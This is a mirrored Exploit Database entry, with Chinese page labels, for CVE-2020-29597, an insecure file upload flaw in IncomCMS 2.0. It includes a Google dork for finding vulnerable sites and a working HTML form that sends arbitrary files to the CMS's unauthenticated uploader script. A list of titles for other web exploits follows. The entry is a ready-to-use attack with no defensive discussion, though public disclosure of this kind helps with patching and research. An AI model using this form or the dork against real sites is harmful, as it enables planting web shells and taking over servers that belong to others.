IncomCMS 2.0 – Insecure File Upload

Exploit Database
18 阅读

作者： MoeAlBarbari

日期： 2021-01-05
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/49351/

# Exploit Title:IncomCMS 2.0 - Insecure File Upload
# Google Dork: intext:"Incom CMS 2.0"
# Date: 07.12.2020
# Exploit Author: MoeAlBarbari
# Vendor Homepage:https://www.incomcms.com/
# Version: 2.0
# Tested on: BackBox linux
# CVE: CVE-2020-29597

<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
<p>Upload your file</p>
<input type="file" name="Filedata"></input><br />
<input type="submit" value="Upload"></input>
</form>
</body>
</html>

last Exploits
IncomCMS 2.0 – Insecure File Upload的更多信息

WeBid 1.0.2 – Persistent Cross-Site Scripting (via SQL Injection)：
XT:Commerce < 3.04 SP2.1 - Cross-Site Scripting：
Inout Article Base Ultimate – Arbitrary File Upload：
WordPress Epsilon Framework Multiple Themes – Unauthenticated Function Injection：
Netgear ReadyNAS LAN /dbbroker 6.2.4 – Credential Disclosure：
TeamPass 2.1.5 – ‘login’ HTML Injection：
NewsBee CMS 1.4 – ‘home-text-edit.php’ SQL Injection：
Serendipity 2.5.0 – Remote Code Execution (RCE)：